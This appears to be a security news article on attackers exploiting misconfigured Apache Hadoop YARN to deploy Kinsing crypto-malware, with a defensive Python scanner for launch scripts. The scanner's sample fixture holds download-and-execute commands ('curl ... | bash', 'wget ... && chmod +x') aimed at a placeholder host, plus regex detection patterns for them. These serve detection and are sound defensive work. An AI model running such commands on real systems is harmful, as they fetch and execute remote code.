Apache Hadoop YARN is a technology for cluster management. We also use this technology for executing. It is part of the Hadoop framework, and some recent analysis reports suggest that cybercriminals are trying to exploit misconfiguration in Apache Hadoop YARN.
The researchers observed that, to exploit the framework, the cybercriminals deployed crypto-malware in the YARN service. They said that this compromise of Apache Hadoop YARN introduces a great amount of security risk. The hackers steal credentials and information, and to increase their rate of success they attack as many systems as possible.
The tools and techniques the hackers use to exploit the flaws in the service are:
- The attackers send commands to the vulnerable service in an HTTP POST request. YARN receives the command from the attacker and creates launch scripts.
- After the launch scripts execute, remote scripts are downloaded, and these deploy the Kinsing malware.
- They also use a port scanning tool to spot other vulnerable services.
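The first two steps leave a trace a defender can check: the launch script YARN creates contains the submitted command, including any download of a remote script. The following is an added example, not code from the researchers or from Hadoop. It scans launch script text for a `curl` or `wget` fetch that is piped into a shell or run after saving. The function name, the patterns, and the sample script are assumptions constructed for illustration.

```python
import re

# A curl/wget invocation and the URL it fetches (same shell command segment).
URL_FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&\n]*?(https?://[^\s\"'|;&]+)", re.I)
# Output piped straight into a shell: "| sh", "| bash", "| /bin/sh".
PIPE_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:/\S*/)?(?:ba|da|z|k)?sh\b")
# File saved first, then made executable or run: "&& chmod +x", "; sh f", "&& ./f".
RUN_AFTER = re.compile(
    r"(?:&&|;)\s*(?:chmod\s+\+x\b|(?:/\S*/)?(?:ba|da|z|k)?sh\s+\S|\./\S)")

# Constructed sample of a container launch script. Hosts are documentation
# addresses and reserved names, not indicators from any report.
SAMPLE = '''#!/bin/bash
export HADOOP_CONF_DIR="/etc/hadoop/conf"
# curl http://example.invalid/ignored.sh | sh
exec /bin/bash -c "curl -s http://203.0.113.10/d.sh | bash"
exec /bin/bash -c "wget -q -O /tmp/j http://203.0.113.10/j && chmod +x /tmp/j"
exec /bin/bash -c "curl -sO https://repo.example.invalid/app.jar"
'''

def scan_launch_script(text):
    """Return one finding per line that fetches a remote URL.

    kind is 'pipe-to-shell' or 'download-then-run' when the fetched content
    is executed, and 'fetch-only' when it is only downloaded (review by hand).
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines, comments and the shebang carry no command
        match = URL_FETCH.search(stripped)
        if not match:
            continue
        rest = stripped[match.end():]  # what happens after the download
        if PIPE_SHELL.search(rest):
            kind = "pipe-to-shell"
        elif RUN_AFTER.search(rest):
            kind = "download-then-run"
        else:
            kind = "fetch-only"
        findings.append({"line": lineno, "url": match.group(1), "kind": kind})
    return findings

if __name__ == "__main__":
    for f in scan_launch_script(SAMPLE):
        print(f"line {f['line']}: {f['kind']:<17} {f['url']}")
```

Legitimate jobs can also download files, so a `fetch-only` finding is a prompt for review, while the two execute kinds warrant immediate investigation of the submitting host.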
Conclusion:
The researchers suggest that the attackers' main goal is to disable the protection systems offered by the cloud service. The cloud service provider does not have the sole duty of maintaining the security of the company. Companies that use such third-party systems should also set up, maintain, and upgrade their own security systems to keep their data safe.